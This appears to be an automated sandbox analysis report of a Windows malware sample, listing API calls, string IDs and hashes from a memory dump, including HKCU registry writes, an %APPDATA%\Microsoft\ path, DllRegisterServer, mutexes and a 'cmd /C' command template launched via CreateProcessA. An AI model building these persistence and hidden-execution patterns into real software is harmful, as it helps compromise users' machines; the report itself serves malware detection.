  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
